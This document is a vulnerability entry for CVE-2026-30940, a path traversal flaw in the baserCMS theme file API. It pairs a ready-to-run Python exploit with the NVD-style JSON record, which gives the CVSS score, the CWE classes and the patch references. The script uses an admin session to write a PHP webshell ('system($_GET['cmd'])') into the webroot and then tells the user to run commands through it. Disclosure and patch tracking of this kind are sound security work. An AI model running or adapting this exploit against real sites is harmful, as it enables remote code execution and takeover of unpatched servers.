CVE-2026-30940

import requests # Target configuration target_url = "http://example.com/baser/api/admin/bc-theme-file/theme_files/add.json" # Administrator session cookie (Required) admin_cookies = { "PHPSESSID": "valid_admin_session_id" } # Exploit payload: Write a webshell to the webroot using path traversal # Adjust the number of "../" based on the directory depth exploit_data = { "theme": "BcThemeSample", "plugin": "BaserCore", "path": "../../../webroot/shell.php", "content": "<?php system($_GET['cmd']); ?>" } try: response = requests.post(target_url, data=exploit_data, cookies=admin_cookies) if response.status_code == 200: print("[+] File write request sent successfully.") print("[+] Check your webshell at: /shell.php?cmd=whoami") else: print("[-] Request failed. Status code:", response.status_code) print(response.text) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-30940", "sourceIdentifier": "[email protected]", "published": "2026-03-31T01:16:36.430", "lastModified": "2026-04-01T20:26:17.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "baserCMS is a website development framework. Prior to version 5.2.3, a path traversal vulnerability exists in the theme file management API (/baser/api/admin/bc-theme-file/theme_files/add.json) that allows arbitrary file write. An authenticated administrator can include ../ sequences in the path parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE). This issue has been patched in version 5.2.3."}, {"lang": "es", "value": "baserCMS es un framework de desarrollo de sitios web. Antes de la versión 5.2.3, existe una vulnerabilidad de salto de ruta en la API de gestión de archivos de temas (/baser/api/admin/bc-theme-file/theme_files/add.json) que permite la escritura arbitraria de archivos. Un administrador autenticado puede incluir secuencias ../ en el parámetro de ruta para crear un archivo PHP en un directorio arbitrario fuera del directorio de temas, lo que puede resultar en ejecución remota de código (RCE). Este problema ha sido parcheado en la versión 5.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:basercms:basercms:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.2.3", "matchCriteriaId": "07DEEEF3-0621-431D-8A38-405EDBD0957E"}]}]}], "references": [{"url": "https://basercms.net/security/JVN_20837860", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}